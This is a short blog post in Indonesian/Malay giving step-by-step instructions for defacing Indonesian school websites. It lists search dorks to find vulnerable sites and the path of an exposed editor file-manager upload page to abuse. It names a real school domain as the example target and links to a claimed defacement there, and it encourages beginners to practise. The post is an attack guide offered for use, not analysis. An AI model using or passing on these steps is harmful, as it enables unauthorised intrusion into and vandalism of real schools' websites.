Friday, 7 June 2013

Cara Deface Website Sekolah Indonesia

                                

1. Siapkan file deface txt / html anda

2. Dork: 
  • inurl:/html/siswa.php? 
  • inurl:/html/alumni.php?
  • inurl:/html/guru.php?
3.  Exploit :  /editor/filemanager/connectors/test.html (copy ni)

4. Contoh admin dapat website ni :

http://www.sman1kotabaru.sch.id/html/siswa.php

Gantikan Menjadi ini :

http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/test.html
5. Ganti ASP jadi PHP.


6. Browse file txt / html yang sudah disiapkan -> open -> upload.

7. Nak Lihat Deface anda : http://xxx.sch.id/userfiles/file/nama-file.txt

Hasil Deface : 
http://www.sman1kotabaru.sch.id/userfiles/file/khai.txt

Belajar yang upload-upload dulu :3 bila dah pro baru boleh belajar yang lebih atas lagi :)

Related post you might like to see

0   comments

Post a Comment

Cancel Reply